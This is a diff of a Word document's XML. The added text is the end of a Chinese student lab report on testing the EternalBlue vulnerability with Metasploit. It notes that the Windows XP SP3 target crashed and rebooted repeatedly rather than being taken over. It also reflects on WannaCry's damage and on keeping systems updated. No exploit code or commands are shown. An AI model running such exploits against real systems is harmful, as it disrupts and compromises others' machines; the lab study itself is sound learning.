+                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">    </w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:numPr>
+                <w:ilvl w:val="0"/>
+                <w:numId w:val="0"/>
+              </w:numPr>
+              <w:ind w:left="420" w:leftChars="0" w:firstLine="480" w:firstLineChars="200"/>
+              <w:jc w:val="both"/>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia" w:ascii="等线" w:hAnsi="等线" w:eastAsia="等线" w:cs="等线"/>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia" w:ascii="等线" w:hAnsi="等线" w:eastAsia="等线" w:cs="等线"/>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>被攻击主机windos xp sp3 会突然蓝屏，然后无限重启。</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:numPr>
+                <w:numId w:val="0"/>
+              </w:numPr>
+              <w:spacing w:line="300" w:lineRule="auto"/>
+              <w:jc w:val="both"/>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia" w:ascii="等线" w:hAnsi="等线" w:eastAsia="等线" w:cs="等线"/>
+                <w:b/>
+                <w:bCs/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="22"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia" w:ascii="等线" w:hAnsi="等线" w:eastAsia="等线" w:cs="等线"/>
+                <w:b/>
+                <w:bCs/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="22"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">      </w:t>
+            </w:r>
+            <w:r>
+              <w:drawing>
+                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
+                  <wp:extent cx="2940050" cy="2206625"/>
+                  <wp:effectExtent l="0" t="0" r="12700" b="3175"/>
+                  <wp:docPr id="17" name="图片 2"/>
+                  <wp:cNvGraphicFramePr>
+                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                  </wp:cNvGraphicFramePr>
+                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                        <pic:nvPicPr>
+                          <pic:cNvPr id="17" name="图片 2"/>
+                          <pic:cNvPicPr>
+                            <a:picLocks noChangeAspect="1"/>
+                          </pic:cNvPicPr>
+                        </pic:nvPicPr>
+                        <pic:blipFill>
+                          <a:blip r:embed="rId22"/>
+                          <a:stretch>
+                            <a:fillRect/>
+                          </a:stretch>
+                        </pic:blipFill>
+                        <pic:spPr>
+                          <a:xfrm>
+                            <a:off x="0" y="0"/>
+                            <a:ext cx="2940050" cy="2206625"/>
+                          </a:xfrm>
+                          <a:prstGeom prst="rect">
+                            <a:avLst/>
+                          </a:prstGeom>
+                          <a:noFill/>
+                          <a:ln w="9525">
+                            <a:noFill/>
+                          </a:ln>
+                        </pic:spPr>
+                      </pic:pic>
+                    </a:graphicData>
+                  </a:graphic>
+                </wp:inline>
+              </w:drawing>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
               <w:ind w:left="240"/>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
@@ -3073,16 +3708,38 @@
           <w:p>
             <w:pPr>
               <w:ind w:left="240"/>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+              </w:rPr>
             </w:pPr>
           </w:p>
           <w:p>
             <w:pPr>
               <w:ind w:left="240"/>
               <w:rPr>
+                <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
                 <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
               </w:rPr>
-            </w:pPr>
+              <w:t xml:space="preserve">   </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia" w:ascii="等线" w:hAnsi="等线" w:eastAsia="等线" w:cs="等线"/>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>其实此次攻击并不能算是成功因为没有取得目标电脑的控制权，而是导致被攻击主机蓝屏，应该是选择的系统版本的问题。</w:t>
+            </w:r>
           </w:p>
           <w:p>
             <w:pPr>
@@ -3092,6 +3749,22 @@
                 <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
               </w:rPr>
             </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:left="240"/>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
           </w:p>
         </w:tc>
       </w:tr>
@@ -3175,6 +3848,45 @@
           <w:p>
             <w:pPr>
               <w:rPr>
+                <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="Times" w:eastAsia="黑体"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="20"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="Times" w:eastAsia="黑体"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="20"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">   通过实验安全测试平台Metasploit，了解到了如何测试漏洞，甚至利用漏洞进行攻击，也看到了不法分子利用漏洞时的恐怖。对于永恒之蓝漏洞是一个非常高危的漏洞，比特币勒索病毒席卷70多个国家地区，造成大量的财产损失。虽然在测试时并没有完美的成功，但是依然使被攻击主机死机，危害还是非常大的。</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:firstLine="480" w:firstLineChars="200"/>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="Times" w:eastAsia="黑体"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="20"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="Times" w:eastAsia="黑体"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="20"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>在日常生活中对抗漏洞的唯一办法就是使用正版系统并且经常更新，才能尽可能避免受到危害</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
                 <w:rFonts w:ascii="黑体" w:hAnsi="Times" w:eastAsia="黑体"/>
                 <w:sz w:val="24"/>
                 <w:szCs w:val="20"/>
@@ -3189,58 +3901,12 @@
                 <w:szCs w:val="20"/>
               </w:rPr>
             </w:pPr>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:ascii="黑体" w:hAnsi="Times" w:eastAsia="黑体"/>
-                <w:sz w:val="24"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-            </w:pPr>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:ascii="黑体" w:hAnsi="Times" w:eastAsia="黑体"/>
-                <w:sz w:val="24"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-            </w:pPr>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:ascii="黑体" w:hAnsi="Times" w:eastAsia="黑体"/>
-                <w:sz w:val="24"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-            </w:pPr>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:ascii="黑体" w:hAnsi="Times" w:eastAsia="黑体"/>
-                <w:sz w:val="24"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-            </w:pPr>
+            <w:bookmarkStart w:id="1" w:name="_GoBack"/>
+            <w:bookmarkEnd w:id="1"/>
           </w:p>
         </w:tc>
       </w:tr>
     </w:tbl>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="黑体" w:hAnsi="Times" w:eastAsia="黑体"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="30"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p/>
     <w:p>
       <w:pPr>
         <w:rPr>
@@ -3248,13 +3914,6 @@
           <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t>12</w:t>
-      </w:r>
     </w:p>
     <w:sectPr>
       <w:pgSz w:w="11906" w:h="16838"/>
